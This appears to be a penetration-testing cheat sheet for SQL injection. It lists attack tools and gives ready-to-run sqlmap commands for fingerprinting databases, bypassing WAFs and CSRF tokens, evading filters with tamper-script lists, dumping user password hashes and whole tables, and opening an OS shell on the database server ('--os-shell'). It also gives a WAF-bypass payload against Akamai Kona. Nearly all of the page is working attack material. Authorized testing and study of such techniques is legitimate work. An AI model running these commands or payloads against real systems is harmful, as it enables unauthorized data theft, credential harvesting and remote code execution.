SQL_Injection - Documentation

Link to this headingSQL Injection

SQL Injection Wiki
SQL Injection CheatSheet

PowerShell Toolkit for Attacking SQL Server
SQL Injection with Code Execution in memory
Auto SQLmap
A Python Framework For NoSQL Scanning and Exploitation
Auto SQLi through google dorking
SQL Injection cheatsheet
Oracle Database Attacking Tool
Microsoft SQL Database Attacking Tool
SQL Vulnerability Scanner
MongoDB auditing and pentesting tool
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

Link to this headingSQLMap

Clone from dev for bleeding edge:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Link to this headingInitial information of Injection

Fingerprinting:

./sqlmap.py -u <request-file> --fingerprint --dns-domain=dns.example.org

Get Database banner:

./sqlmap.py --url="<url>" --data="<post-data>" --banner

Get database username, name, and hostname

./sqlmap.py -u <request-file> --current-user --current-db --hostname

Link to this headingRun SQLMap via a Request file

python sqlmap-dev/sqlmap.py -r login-request.txt

Sample Request File

POST /vuln.php HTTP/1.1 Host: www.target.com User-Agent: Mozilla/4.0 id=%INJECT HERE%

Link to this headingBypassing

Identify WAF

./sqlmap.py -u <request-file> --identify-waf --safe-url=https://mail.google.com/inbox --user-agent=AGENT

Bypass CSRF:

./sqlmap.py --csrf-url=https://www.gmail.com/login --csrf-token=CSRF_TOKEN

Tamper Scripts:

sqlmap.py -r reg.txt --levelv=3 --risk=3 -p keys --dbms=mysql --tamper=space2comments,randomcomments --proxy=http://localhost:8888

Link to this headingChecking Permissions

Check if user is a database admin

./sqlmap.py -u <request-file> --is-dba

Get database users and password hashes

./sqlmap.py -u <request-file> --users --passwords --privileges --roles --dbs

Link to this headingDumping Database

Enumerate databases

./sqlmap.py -u <request-file> --dbs

Extract data

./sqlmap.py -u <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

List tables for one database

./sqlmap.py -u <request-file> -D <db-name> --tables

List columns for one database

./sqlmap.py -u <request-file> -D <db-name> --columns

List schema for one database

./sqlmap.py -u <request-file> -D <db-name> --schema

Other database flags

./sqlmap.py -u <request-file> -D <db-name> --count

Execute SQL Query

./sqlmap.py -u <request-file> --sql-query="<sql-query>"

Append/Prepend SQL Queries

./sqlmap.py -u <request-file> --prefix="<sql-query>" --suffix="<sql-query>"

Get backdoor access to sql server | can give shell access

./sqlmap.py -u <request-file> --os-shell

Run from file with threads:

python sqlmap-dev/sqlmap.py -r login-request.txt --threads=10

Run from file with threads and level:

python sqlmap-dev/sqlmap.py -r login-request.txt --level=5 --risk=3

Link to this headingTampering:

General Tamper Testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL Tamper Testing:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL Tamper Testing:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Link to this headingBypassing

Link to this headingAkamai Kona Bypass

MID instead of SUBSTRING
LIKE instead of =
/**/ instead of a space
CURRENT_USER instead of CURRENT_USER()
" instead of '

Final example:

444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#

Blogs

Link to this headingStored Procedure

Stored procedures are only safe if EXEC() is not being used. If you use EXEC() with dynamic content, you’re vulnerable to SQL injections exactly as if you were executing the query manually.